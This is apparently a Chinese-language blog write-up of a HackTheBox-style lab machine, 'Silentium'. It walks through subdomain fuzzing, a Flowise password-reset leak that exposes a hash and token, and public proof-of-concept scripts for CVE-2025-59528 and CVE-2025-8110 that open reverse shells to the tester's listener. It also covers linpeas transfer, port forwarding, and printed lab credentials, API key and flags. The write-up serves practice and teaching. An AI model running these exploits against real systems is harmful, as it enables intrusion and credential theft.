Silentium

UserFlag

CVE-2025-59528

先用nmap扫一下

1
nmap -A 10.129.137.240

image-20260417002132995

22端口ssh服务

80端口web服务需要重定向

image-20260417002136134

子域名爆破

1
ffuf -w /home/kali/Desktop/Info/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://silentium.htb/ -H 'Host: FUZZ.silentium.htb' -mc 200 -fw 4

image-20260417002138626

添加到/etc/hosts中

image-20260417002141091

访问http://staging.silentium.htb

image-20260417002143897

看到页面是Flowise - Build AI Agents, Visually,就去找相关的漏洞,发现了一个可利用的RCE和任意文件读取https://www.freebuf.com/articles/ai-security/476409.html

image-20260417002146393

里面提到了三个CVE,CVE-2025-59528,CVE-2025-8943,CVE-2025-26319

在这个登录界面尝试抓包

image-20260417002149031

image-20260417002151802

根据不同的报错发现可能存在ben用户,尝试爆破密码

发现角落有一个忘记密码,依旧尝试抓包看一下

image-20260417002154455

发现这里有一些身份信息

image-20260417002157299

1
{"user":{"id":"e26c9d6c-678c-4c10-9e36-01813e8fea73","name":"admin","email":"ben@silentium.htb","credential":"$2a$05$6o1ngPjXiRj.EbTK33PhyuzNBn2CLo8.b0lyys3Uht9Bfuos2pWhG","tempToken":"GzXqBEoeLdzLKcbFIFQVuSZrCulcGWBtEJBmc4qvGqcL3XjLyEFjL61qTNBHFqBn","tokenExpiry":"2026-04-16T12:05:46.075Z","status":"active","createdDate":"2026-01-29T20:14:57.000Z","updatedDate":"2026-04-16T11:50:46.000Z","createdBy":"e26c9d6c-678c-4c10-9e36-01813e8fea73","updatedBy":"e26c9d6c-678c-4c10-9e36-01813e8fea73"},"organization":{},"organizationUser":{},"workspace":{},"workspaceUser":{},"role":{}}

image-20260417002159914

点击修改密码

image-20260417002202896

将刚刚得到的token信息填入,修改密码然后登录就行了(这里要快一点,他的token一直在变,如果第一次没成功可以多试几次)

image-20260417002205852

image-20260417002209671

尝试利用CVE-2025-59528POC:https://github.com/AzureADTrent/CVE-2025-58434-59528/blob/main

创建虚拟环境

1
2
python3 -m venv .venv
source .venv/bin/activate

运行代码

1
python3 CVE-2025-59528.py -t http://staging.silentium.htb/ -e ben@silentium.htb 

http://staging.silentium.htb/apikey获取APIkey

1
hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc

image-20260417002213070

反弹shell成功

image-20260417002215832

现在身份是root,但是是在docker容器中的,这里可以尝试查看环境变量

image-20260417002219300

在这里看到了password,尝试利用ssh登录之前的ben用户

1
2
ssh ben@10.129.24.124
password:r04D!!_R4ge

image-20260417002222190

得到userflag

image-20260417002226086

1
6f2b1cf6144d71e35dffb0a5dfd268ce

RootFlag

CVE-2025-8110

先利用linpeas查看是否存在可利用的提权

现在kali上起一个php服务

1
php -S 0:8081

再利用wget将linpeas传到靶机上

1
wget http://10.10.17.116:8081/linpeas.sh

获得运行权限

1
2
chmod +x linpeas.sh
./linpeas.sh

image-20260417002228938

但是没有发现什么可用的,既没有suid也没有sudo

尝试查看网络服务

1
netstat -tulpn

image-20260417002232134

看到有3001端口,利用端口转发带出

1
ssh -L 3001:127.0.0.1:3001 ben@10.129.24.124

image-20260417002236195

本地访问http://127.0.0.1:3001/

image-20260417002245711

注册一个普通账户登录111,密码是123

找到CVE-2025-8110poc:https://github.com/Ghxstsec/CVE-2025-8110

image-20260417002242826

这里需要修改成自己的username和token

token的获取在/user/settings/applications路由下

image-20260417002249485

修改保存后就可以运行代码了

先在kali上监听一个6666端口

1
python3 CVE-2025-8110.py -u http://127.0.0.1:3001 -lh 10.10.17.116 -lp 6666 -p '123'

image-20260417002252224

得到flag

image-20260417002255227

1
58a4cf6091deb7802da594aa78ea539a

Silentium
https://colourful228.github.io/2026/04/16/Silentium/
作者
Colourful
发布于
2026年4月16日
更新于
2026年4月17日
许可协议